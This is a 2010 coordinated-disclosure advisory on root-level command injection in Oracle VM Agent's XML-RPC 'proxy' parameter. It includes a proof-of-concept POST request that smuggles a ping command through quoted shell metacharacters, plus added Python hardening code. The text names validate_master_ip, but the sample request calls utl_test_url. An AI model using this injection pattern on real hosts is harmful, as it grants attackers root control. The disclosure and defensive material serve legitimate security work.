Oracle Virtual Server Agent Command Injection
=============================================

1. Advisory Information

Advisory ID: BONSAI-2010-0109
Date published: 2010-10-13
Vendors contacted: Oracle
Release mode: Coordinated release

2. Vulnerability Information

Class: Injection
Remotely Exploitable: Yes
Locally Exploitable: Yes
3. Software Description

Oracle VM is server virtualization software which fully supports both Oracle and non-Oracle applications. Oracle VM offers scalable, low-cost server virtualization that is three times more efficient than existing server virtualization products from other vendors. Oracle has also announced certification of key Oracle products including Oracle Database, Oracle Fusion Middleware, Oracle Applications, and Oracle Real Application Clusters with Oracle VM.
Oracle VM Manager communicates with Oracle VM Agent to create and manage guests on an Oracle VM Server. Oracle VM Agent is installed and configured during the installation of Oracle VM Server.
By default, Oracle VM Agent runs as a highly privileged user, typically root.
4. Vulnerability Description

Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.

5. Vulnerable packages

We ran our tests using Oracle Virtual Server release 2.2.0 with Oracle VM Agent 2.3.

6. Non-vulnerable packages

Patch set 2.2.1 and above.

7. Credits

This vulnerability was discovered by Nahuel Grisolia ( nahuel -at- bonsai-sec.com ).
8. Technical Description

8.1. OS Command Injection

CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)

Oracle VS Agent is prone to a remote command execution vulnerability because the software fails to adequately sanitize user-supplied input.

Oracle VS Agent exposes several functions through XML-RPC. One of these functions is validate_master_ip, which receives four parameters. The second parameter, "proxy", is vulnerable to command injection: it is not properly sanitized and its content is concatenated into an operating system command that is executed as a highly privileged user (typically root).

The following POST message can be sent to the VM Agent XML-RPC port. By doing this, the ping command is executed as follows:
POST /RPC2 HTTP/1.0
User-Agent: XML-RPC for PHP 3.0.0.beta
authorization: Basic XXXXXXXXXXXXXXX
Host: XXX.XXX.XXX.XXX:8899
Accept-Encoding: gzip, deflate
Accept-Charset: UTF-8,ISO-8859-1,US-ASCII
Content-Type: text/xml
Content-Length: 416

<?xml version="1.0"?>
<methodCall>
  <methodName>utl_test_url</methodName>
  <params>
    <param>
      <value><string>http://192.168.1.101</string></value>
    </param>
    <param>
      <value><string>192.168.1.103'; ping -c 10 localhost; '</string></value>
    </param>
    <param>
      <value><string>192.168.1.101</string></value>
    </param>
    <param>
      <value><string>192.168.1.101</string></value>
    </param>
  </params>
</methodCall>
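The root cause described above is untrusted XML-RPC parameter text spliced into a shell command line. The following is an added illustration, not code from the advisory or from Oracle VM Agent, of how such a handler can be hardened: the request body is decoded with the standard XML-RPC parser, the "proxy" parameter is accepted only if it parses as an IP address literal, and the command is launched as an argv list with no shell. The method name, the four-argument layout and the use of ping as the underlying command are taken from the advisory's own example; treating the second positional argument as the proxy host, and everything else about the agent's internals, is an assumption. The sample request bodies are constructed here, not captured traffic.

```python
import ipaddress
import subprocess
import xmlrpc.client

# Constructed sample bodies (not captured traffic). xmlrpc.client.dumps wraps
# the positional arguments in <methodCall>, in the same layout as the
# advisory's request: four string parameters, the second one being "proxy".
GOOD_REQUEST = xmlrpc.client.dumps(
    ("http://192.168.1.101", "192.168.1.103", "192.168.1.101", "192.168.1.101"),
    methodname="validate_master_ip")
BAD_REQUEST = xmlrpc.client.dumps(
    ("http://192.168.1.101", "192.168.1.103 extra", "192.168.1.101", "192.168.1.101"),
    methodname="validate_master_ip")


def parse_xmlrpc_request(body):
    """Return (method_name, params) from an XML-RPC <methodCall> body."""
    params, method = xmlrpc.client.loads(body)
    return method, list(params)


def is_ip_address(value):
    """True only for a literal IPv4/IPv6 address. Whitespace, quotes and shell
    metacharacters never parse as an address, so they are rejected up front."""
    if not isinstance(value, str):
        return False
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def unsafe_shell_line(proxy):
    """The pattern the advisory describes: untrusted text concatenated into a
    command line meant for a shell. Kept only for contrast; never executed."""
    return "ping -c 1 '" + proxy + "'"


def build_ping_argv(proxy):
    """Hardened form: validate first, then pass the value as one argv element.
    With no shell in the path, the value cannot become a second command."""
    if not is_ip_address(proxy):
        raise ValueError("proxy must be an IP address literal")
    return ["ping", "-c", "1", proxy]


def default_runner(argv):
    # shell=False: argv goes straight to execve, no shell parsing of the value.
    return subprocess.run(argv, shell=False, capture_output=True, timeout=15)


def handle_request(body, runner=default_runner):
    """Dispatch a validate_master_ip call. Assumed layout: the second positional
    parameter is the "proxy" host named in the advisory; the others are unused
    here. Returns a dict describing the outcome instead of raising."""
    method, params = parse_xmlrpc_request(body)
    if method != "validate_master_ip" or len(params) != 4:
        return {"ok": False, "error": "unexpected method or arity"}
    try:
        argv = build_ping_argv(params[1])
    except ValueError as exc:
        return {"ok": False, "error": str(exc)}
    runner(argv)
    return {"ok": True, "argv": argv}
```

The `runner` parameter exists so the handler can be exercised without a ping binary; in production the default `subprocess.run` call is used. The allow-list check is the important part: once the value is known to be an IP literal, the argv form is safe by construction rather than by escaping.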
9. Report Timeline

• 2010-09-24 / Bonsai provides vulnerability information to ORACLE
• 2010-09-29 / Oracle confirms the vulnerability
• 2010-10-12 / Oracle publishes Critical Patch Update fix
• 2010-10-13 / Public disclosure

10. About Bonsai

Bonsai is a company involved in providing professional computer information security services. Currently a sound growth company, since its foundation in early 2009 in Buenos Aires, Argentina, we are fully committed to quality service, and focused on our customers' real needs.

11. Disclaimer

The contents of this advisory are copyright (c) 2010 Bonsai Information Security, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

12. Research

http://www.bonsai-sec.com/en/research/vulnerability.php